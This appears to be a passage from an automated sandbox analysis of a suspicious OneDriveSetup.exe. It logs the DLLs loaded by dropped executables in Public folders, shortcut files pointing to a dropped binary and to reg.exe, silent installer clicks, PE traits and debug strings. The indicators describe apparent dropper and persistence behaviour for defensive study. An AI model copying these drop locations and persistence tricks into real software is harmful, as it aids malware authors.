                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: oleacc.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: opengl32.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: version.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: libcef.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: iphlpapi.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: wininet.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: urlmon.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: glu32.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: msimg32.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: uxtheme.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: oledlg.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: winmm.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: iertutil.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: srvcli.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: netutils.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: mswsock.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: napinsp.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: pnrpnsp.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: wshbth.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: nlaapi.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: dnsapi.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: winrnr.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: apphelp.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devrtl.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: spinf.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: drvstore.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: newdev.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptsp.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: rsaenh.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: gpapi.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cabinet.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpnpmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: devrtl.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: devrtl.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: drvstore.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: cabinet.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: devrtl.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: drvstore.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: devobj.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: cabinet.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netsetupsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netsetupapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netsetupengine.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: implatsetup.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: devrtl.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: spinf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: drvstore.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
                Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\OneDriveSetup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: dick.lnk.0.dr LNK file: ..\..\Users\Public\Music\20250413054815\Agghosts.exe
                Source: 2.lnk.0.dr LNK file: ..\..\Windows\System32\reg.exe
                Source: C:\Users\Public\Videos\bin.exe Automated click: Next >
                Source: C:\Users\Public\Videos\bin.exe Automated click: I Agree
                Source: C:\Users\Public\Videos\bin.exe Automated click: Install
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\Public\Videos\bin.exe Window detected: < &Back | I &Agree | Cancel | Nullsoft Install System v3.10 | License Agreement | Please review the license terms before installing letsvpn. Press Page Down to see the rest of the agreement. | LetsVPN Terms of Service
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: OneDriveSetup.exe Static PE information: More than 263 > 100 exports found
                Source: OneDriveSetup.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: OneDriveSetup.exe Static PE information: Image base 0x140000000 > 0x60000000
                Source: OneDriveSetup.exe Static file information: File size 83625512 > 1048576
                Source: OneDriveSetup.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x34ac00
                Source: OneDriveSetup.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x116e00
                Source: OneDriveSetup.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x4b17c00
                Source: OneDriveSetup.exe Static PE information: More than 200 imports for KERNEL32.dll
                Source: OneDriveSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: OneDriveSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: OneDriveSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: OneDriveSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: OneDriveSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: OneDriveSetup.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: OneDriveSetup.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdbSHA256 source: bin.exe, 00000017.00000003.1585292674.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdbSHA256 source: bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: bin.exe, 00000017.00000003.1562615212.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdbX+r+ d+_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1600056818.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb source: bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: bin.exe, 00000017.00000003.1513635861.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: bin.exe, 00000017.00000003.1576354512.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb source: bin.exe, 00000017.00000003.1594016654.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: bin.exe, 00000017.00000003.1607566852.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001D.00000000.1811026709.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001D.00000002.1813119826.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000002.1855324120.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 0000001F.00000000.1813487867.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.1856420036.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.1857742975.00007FF67B9D1000.00000020.00000001.01000000.00000017.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb8)R) D)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1580441083.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdbSHA256T source: bin.exe, 00000017.00000003.1586870010.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Net.Http\netfx\System.Net.Http.pdb source: bin.exe, 00000017.00000003.1592925390.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: bin.exe, 00000017.00000003.1510230437.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.ResourceManager\4.0.1.0\System.Resources.ResourceManager.pdb source: bin.exe, 00000017.00000003.1602872671.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdbSHA256 source: bin.exe, 00000017.00000003.1552758930.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: bin.exe, 00000017.00000003.1569651251.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: bin.exe, 00000017.00000003.1621744394.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO\4.1.2.0\System.IO.pdb source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdb source: bin.exe, 00000017.00000003.1624506293.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications.Messages\obj\Release\ToastNotifications.Messages.pdb source: bin.exe, 00000017.00000003.1644108290.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq\4.1.2.0\System.Linq.pdb source: bin.exe, 00000017.00000003.1590499522.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdb source: bin.exe, 00000017.00000003.1591734252.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdb source: bin.exe, 00000017.00000003.1622286946.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdb source: bin.exe, 00000017.00000003.1616704287.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Http.Facade/Release/net461/System.ServiceModel.Http.pdbSHA256 source: bin.exe, 00000017.00000003.1624506293.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Drawing.Primitives\4.0.2.0\System.Drawing.Primitives.pdb source: bin.exe, 00000017.00000003.1573517122.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb4 source: bin.exe, 00000017.00000003.1548626041.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Data.Common/netfx\System.Data.Common.pdb source: bin.exe, 00000017.00000003.1563813058.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.DriveInfo\4.0.2.0\System.IO.FileSystem.DriveInfo.pdb source: bin.exe, 00000017.00000003.1578661001.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdb source: bin.exe, 00000017.00000003.1573124674.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdbSHA256zqXL source: bin.exe, 00000017.00000003.1622286946.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdbSHA256 source: bin.exe, 00000017.00000003.1593483290.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WebView2Loader.dll.pdb source: bin.exe, 00000017.00000003.1678131607.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1678869626.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1663031979.0000000002737000.00000004.00000020.00020000.00000000.sdmp
